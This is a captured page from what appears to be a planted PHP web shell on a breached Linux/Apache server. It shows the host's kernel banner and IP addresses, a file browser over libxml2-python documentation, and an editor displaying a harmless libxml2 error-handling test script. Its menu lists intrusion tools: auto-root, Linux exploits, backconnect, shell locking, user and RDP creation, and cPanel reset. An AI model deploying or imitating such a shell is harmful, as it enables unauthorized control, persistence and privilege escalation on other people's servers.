Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.191.97.133
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml2-python-2.9.1 /
[ HOME SHELL ]
Name
Size
Permission
Action
TODO
1.58
KB
-rw-r--r--
apibuild.py
79.75
KB
-rwxr-xr-x
attribs.py
819
B
-rwxr-xr-x
build.py
1.51
KB
-rwxr-xr-x
compareNodes.py
1.48
KB
-rwxr-xr-x
ctxterror.py
1.29
KB
-rwxr-xr-x
cutnpaste.py
1.26
KB
-rwxr-xr-x
dtdvalid.py
619
B
-rwxr-xr-x
error.py
1.04
KB
-rwxr-xr-x
inbuf.py
498
B
-rwxr-xr-x
index.py
32.14
KB
-rwxr-xr-x
indexes.py
2.9
KB
-rwxr-xr-x
input_callback.py
5.01
KB
-rwxr-xr-x
libxml2class.txt
22.42
KB
-rw-r--r--
nsdel.py
1.55
KB
-rwxr-xr-x
outbuf.py
3.07
KB
-rwxr-xr-x
push.py
769
B
-rwxr-xr-x
pushSAX.py
1.46
KB
-rwxr-xr-x
pushSAXhtml.py
1.57
KB
-rwxr-xr-x
python.html
19.46
KB
-rw-r--r--
reader.py
12.23
KB
-rwxr-xr-x
reader2.py
5.22
KB
-rwxr-xr-x
reader3.py
4.06
KB
-rwxr-xr-x
reader4.py
1.15
KB
-rwxr-xr-x
reader5.py
1.22
KB
-rwxr-xr-x
reader6.py
2.61
KB
-rwxr-xr-x
reader7.py
1.72
KB
-rwxr-xr-x
reader8.py
683
B
-rwxr-xr-x
readererr.py
1.25
KB
-rwxr-xr-x
readernext.py
2.43
KB
-rwxr-xr-x
regexp.py
716
B
-rwxr-xr-x
relaxng.py
1.17
KB
-rwxr-xr-x
resolver.py
857
B
-rwxr-xr-x
schema.py
1.28
KB
-rwxr-xr-x
serialize.py
4.18
KB
-rwxr-xr-x
sync.py
3.44
KB
-rwxr-xr-x
thread2.py
2.25
KB
-rwxr-xr-x
tst.py
587
B
-rwxr-xr-x
tstLastError.py
2.83
KB
-rwxr-xr-x
tstURI.py
1.08
KB
-rwxr-xr-x
tstmem.py
720
B
-rwxr-xr-x
tstxpath.py
1.43
KB
-rwxr-xr-x
validDTD.py
1.2
KB
-rwxr-xr-x
validRNG.py
1.9
KB
-rwxr-xr-x
validSchemas.py
2.02
KB
-rwxr-xr-x
validate.py
1.68
KB
-rwxr-xr-x
walker.py
2.35
KB
-rwxr-xr-x
xpath.py
1.17
KB
-rwxr-xr-x
xpathext.py
1.1
KB
-rwxr-xr-x
xpathleak.py
1.53
KB
-rwxr-xr-x
xpathns.py
552
B
-rwxr-xr-x
xpathret.py
1.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ctxterror.py
#!/usr/bin/python -u # # This test exercise the redirection of error messages with a # functions defined in Python. # import sys import libxml2 # Memory debug specific libxml2.debugMemory(1) expect="""--> (3) xmlns: URI foo is not absolute --> (4) Opening and ending tag mismatch: x line 0 and y """ err="" def callback(arg,msg,severity,reserved): global err err = err + "%s (%d) %s" % (arg,severity,msg) s = """<x xmlns="foo"></y>""" parserCtxt = libxml2.createPushParser(None,"",0,"test.xml") parserCtxt.setErrorHandler(callback, "-->") if parserCtxt.getErrorHandler() != (callback,"-->"): print("getErrorHandler failed") sys.exit(1) parserCtxt.parseChunk(s,len(s),1) doc = parserCtxt.doc() doc.freeDoc() parserCtxt = None if err != expect: print("error") print("received %s" %(err)) print("expected %s" %(expect)) sys.exit(1) i = 10000 while i > 0: parserCtxt = libxml2.createPushParser(None,"",0,"test.xml") parserCtxt.setErrorHandler(callback, "-->") parserCtxt.parseChunk(s,len(s),1) doc = parserCtxt.doc() doc.freeDoc() parserCtxt = None err = "" i = i - 1 # Memory debug specific libxml2.cleanupParser() if libxml2.debugMemory(1) == 0: print("OK") else: print("Memory leak %d bytes" % (libxml2.debugMemory(1))) libxml2.dumpMemory()
Close